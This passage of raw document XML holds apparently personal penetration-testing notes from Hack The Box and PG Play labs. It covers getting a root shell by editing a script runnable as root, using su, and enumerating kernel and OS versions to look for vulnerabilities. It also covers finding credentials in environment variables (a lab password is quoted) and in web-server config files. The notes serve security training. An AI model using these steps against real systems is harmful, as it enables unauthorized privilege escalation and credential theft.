      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015B8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015B9">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to get root shell from running script:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="305"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you are able to run a file as root, then you can check to see if you are able to edit the file. If so, put this code inside the file so that you can access bash as root:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="305"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="305"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you put it inside, make sure you can execute file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="305"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x [file_name]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="305"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now run the file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="305"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ./[file_name]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015C0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015C1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015C2">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding mounted drives (ex. Password on USB drive like in Mirai HTB)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1421"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Running </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">df -h </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">outputs a list of the machine's partitions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015C4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015C5">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Switching users:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="213"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="213"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch to root (by default sometimes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="213"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su - root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="213"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch to root specifically</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="213"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su - [username]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="213"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch to a specific user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015CC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015CD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015CE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Running the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">printenv </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command displays any environment variables that have been set</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1197"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">printenv </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1197"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the Analytics HTB, we saw:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1197"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">META_USER=metalytics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1197"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">META_PASS=An4lytics_ds20223#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1197"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Which is a username and password combination, which allowed SSH</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uname -a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerating the kernel version (from Analytics HTB)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Search for version vulnerability </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="254000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="264" name="image253.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image253.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId432"/>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15D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="189"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId433">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">cybersploit1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, and based on this output, we want to see if Linux "3.13.0-generic" is vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="189"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find information like Ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015DB">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015DC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lsb_release -a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1199"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Display information about the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> specific distribution of Linux </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and the Linux Standard Base (LSB) that is running on the system (from Analytics HTB)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1199"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Search for version vulnerability </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015DF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you find a user in Linux, use "su" to switch into their account (once you know their password):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="317"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su [username]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="317"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to log in as root user, just type "su" without any arguments</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015E3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015E4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015E5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at the "sudo -l" section</w:t>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rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have hacked into a web server, you can go to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to find some credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000015E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="906"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/www/html/include/config.php </w:t>
      </w:r>
